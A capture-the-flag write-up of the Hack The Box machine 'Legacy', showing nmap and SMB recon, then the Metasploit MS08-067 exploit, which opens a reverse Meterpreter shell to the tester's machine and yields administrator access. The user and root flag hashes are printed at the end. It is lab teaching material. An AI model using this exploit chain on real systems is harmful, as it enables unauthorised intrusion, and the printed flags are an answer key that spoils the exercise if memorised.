Legacy Write-Up

Machine IP - 10.10.10.4

Initial Phase

Starting with an nmap scan, we see the following ports open. An aggressive background scan also reveals the same ports.

root@kali:~/Desktop/Hack The Box/legacy# nmap -F 10.10.10.4 Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-12 12:24 +04 Nmap scan report for 10.10.10.4 Host is up (0.21s latency). Not shown: 97 filtered ports PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp closed ms-wbt-server Nmap done: 1 IP address (1 host up) scanned in 4.91 seconds

There seems to be no other vector other than SMB to exploit here. Therefore, trying a little recon using metasploit -

msf5 > use auxiliary/scanner/smb/smb_version msf5 auxiliary(scanner/smb/smb_version) > set RHOST 10.10.10.4 RHOST => 10.10.10.4 msf5 auxiliary(scanner/smb/smb_version) > run [+] 10.10.10.4:445 - Host is running Windows XP SP3 (language:English) (name:LEGACY) (workgroup:HTB ) [*] 10.10.10.4:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed

This gives us the OS as Windows XP SP3. Therefore, googling along the line of 'Windows xp sp3 smb exploit', we get a CVE from the raid7 website which also has a metsploit module.

Exploit Phase

Using the exploit from the rapid7 website, we get the shell as administrator -

msf5 exploit(windows/smb/ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 445 yes The SMB service port (TCP) SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Exploit target: Id Name -- ---- 0 Automatic Targeting msf5 exploit(windows/smb/ms08_067_netapi) > set RHOST 10.10.10.4 RHOST => 10.10.10.4 msf5 exploit(windows/smb/ms08_067_netapi) > exploit [*] Started reverse TCP handler on 10.10.14.68:4444 [*] 10.10.10.4:445 - Automatically detecting the target... [*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English [*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX) [*] 10.10.10.4:445 - Attempting to trigger the vulnerability... [*] Sending stage (179779 bytes) to 10.10.10.4 [*] Meterpreter session 1 opened (10.10.14.68:4444 -> 10.10.10.4:1028) at 2019-04-12 12:38:09 +0400 meterpreter > shell Process 1532 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>cd .. cd .. C:\WINDOWS>cd .. cd .. C:\>dir dir Volume in drive C has no label. Volume Serial Number is 54BF-723B Directory of C:\ 16/03/2017 08:30 �� 0 AUTOEXEC.BAT 16/03/2017 08:30 �� 0 CONFIG.SYS 16/03/2017 09:07 �� <DIR> Documents and Settings 16/03/2017 08:33 �� <DIR> Program Files 12/04/2019 08:28 �� <DIR> WINDOWS 2 File(s) 0 bytes 3 Dir(s) 6.477.336.576 bytes free C:\>cd "Documents and Settings" cd "Documents and Settings" C:\Documents and Settings>dir dir Volume in drive C has no label. Volume Serial Number is 54BF-723B Directory of C:\Documents and Settings 16/03/2017 09:07 �� <DIR> . 16/03/2017 09:07 �� <DIR> .. 16/03/2017 09:07 �� <DIR> Administrator 16/03/2017 08:29 �� <DIR> All Users 16/03/2017 08:33 �� <DIR> john 0 File(s) 0 bytes 5 Dir(s) 6.477.336.576 bytes free C:\Documents and Settings>cd john cd john C:\Documents and Settings\john>dir dir Volume in drive C has no label. Volume Serial Number is 54BF-723B Directory of C:\Documents and Settings\john 16/03/2017 08:33 �� <DIR> . 16/03/2017 08:33 �� <DIR> .. 16/03/2017 09:19 �� <DIR> Desktop 16/03/2017 08:33 �� <DIR> Favorites 16/03/2017 08:33 �� <DIR> My Documents 16/03/2017 08:20 �� <DIR> Start Menu 0 File(s) 0 bytes 6 Dir(s) 6.477.336.576 bytes free C:\Documents and Settings\john>cd Desktop cd Desktop C:\Documents and Settings\john\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is 54BF-723B Directory of C:\Documents and Settings\john\Desktop 16/03/2017 09:19 �� <DIR> . 16/03/2017 09:19 �� <DIR> .. 16/03/2017 09:19 �� 32 user.txt 1 File(s) 32 bytes 2 Dir(s) 6.477.336.576 bytes free C:\Documents and Settings\john\Desktop>type user.txt type user.txt e69af0e4f443de7e36876fda4ec7644f C:\Documents and Settings\john\Desktop>cd ../.. cd ../.. C:\Documents and Settings>cd Administrator cd Administrator C:\Documents and Settings\Administrator>dir dir Volume in drive C has no label. Volume Serial Number is 54BF-723B Directory of C:\Documents and Settings\Administrator 16/03/2017 09:07 �� <DIR> . 16/03/2017 09:07 �� <DIR> .. 16/03/2017 09:18 �� <DIR> Desktop 16/03/2017 09:07 �� <DIR> Favorites 16/03/2017 09:07 �� <DIR> My Documents 16/03/2017 08:20 �� <DIR> Start Menu 0 File(s) 0 bytes 6 Dir(s) 6.477.336.576 bytes free C:\Documents and Settings\Administrator>cd Desktop cd Desktop C:\Documents and Settings\Administrator\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is 54BF-723B Directory of C:\Documents and Settings\Administrator\Desktop 16/03/2017 09:18 �� <DIR> . 16/03/2017 09:18 �� <DIR> .. 16/03/2017 09:18 �� 32 root.txt 1 File(s) 32 bytes 2 Dir(s) 6.477.336.576 bytes free C:\Documents and Settings\Administrator\Desktop>type root.tct type root.tct The system cannot find the file specified. C:\Documents and Settings\Administrator\Desktop>type root.txt type root.txt 993442d258b0e0ec917cae9e695d5713

Thus we get both the root and user flags.